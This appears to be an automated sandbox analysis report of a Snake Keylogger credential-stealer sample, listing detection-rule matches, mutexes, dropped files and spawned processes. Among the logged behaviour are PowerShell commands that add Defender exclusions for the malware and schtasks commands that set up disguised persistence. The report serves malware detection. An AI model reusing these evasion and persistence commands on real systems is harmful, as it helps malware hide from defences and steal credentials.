Source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: rPO0977-6745.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EDyxAgkldisLe.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, k-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, k-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, k-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, k-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, k-.cs	Base64 encoded string: 'OqHzioSHceQ5qotdqa7Ykbba4f6uJp4tWTCMtVxXkiuCL74BelCp1pditD457DF8'
Source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, k-.cs	Base64 encoded string: 'OqHzioSHceQ5qotdqa7Ykbba4f6uJp4tWTCMtVxXkiuCL74BelCp1pditD457DF8'

Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	Security API names: _0020.SetAccessControl
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	Security API names: _0020.AddAccessRule
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, t2qt23C1ZO7pYQfAKA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	Security API names: _0020.SetAccessControl
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	Security API names: _0020.AddAccessRule
Source: 0.2.rPO0977-6745.exe.4509750.1.raw.unpack, t2qt23C1ZO7pYQfAKA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	Security API names: _0020.SetAccessControl
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rPO0977-6745.exe.7af0000.8.raw.unpack, u5QKsh8eHYOmOLmsMj.cs	Security API names: _0020.AddAccessRule
Source: 0.2.rPO0977-6745.exe.44a7330.4.raw.unpack, t2qt23C1ZO7pYQfAKA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/15@4/3

Source: C:\Users\user\Desktop\rPO0977-6745.exe

File created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Mutant created: \Sessions\1\BaseNamedObjects\oXIdkGfpRvwWacgDRTNLtqu
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3644:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03

Source: C:\Users\user\Desktop\rPO0977-6745.exe

File created: C:\Users\user\AppData\Local\Temp\tmp44AD.tmp

Jump to behavior

Source: rPO0977-6745.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: rPO0977-6745.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\rPO0977-6745.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\rPO0977-6745.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000317B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3697372033.0000000003FAF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000316D000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000315D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3696801560.0000000003821000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A12000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rPO0977-6745.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\rPO0977-6745.exe

File read: C:\Users\user\Desktop\rPO0977-6745.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
